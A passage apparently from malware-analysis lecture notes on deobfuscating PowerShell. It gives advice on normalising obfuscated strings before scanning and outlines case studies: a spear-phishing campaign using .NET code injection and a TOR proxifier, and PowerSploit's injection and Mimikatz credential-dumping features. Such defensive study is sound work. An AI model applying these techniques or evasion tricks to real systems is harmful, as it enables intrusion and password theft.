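    print(deobfuscate_reversed_list(SAMPLE_JS))
```

Run `normalize` first and feed the result to any indicator matching; a scanner that looks at the raw text sees `Ne`w-Ob`ject` and `'Ne'+'w-Ob'+'ject'` but not `New-Object`. The Base64 check treats a blob as encoded only when it decodes to printable text, so a short word that happens to fit the Base64 alphabet is left untouched instead of turning into garbage.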
Case Study 3 – Targeted Spear Phishing Campaign (slides 92–94)
Deploys 3 Powershell scripts on the victim's machine
Payload 1 – .NET code injection using Add-Type
Creation of a new type/class using .NET code
Creating an instance of the class and invoking its Start method
Payload 2 – .NET code injection using Add-Type like the 1st payload
Imports multiple Win32 API functions using .NET
Payload 3 – Downloads TOR Proxifier as a scheduled task
Case Study 4 – Powersploit + Invoke-Obfuscation (slide 95)
Open source project available on GitHub
PowerSploit includes capabilities such as:
Shellcode injection
Reflective DLL injection
WMI
Code execution
Mimikatz – NTLM/LM password dump
Invoke-Obfuscation is a Powershell code obfuscation framework developed by Daniel Bohannon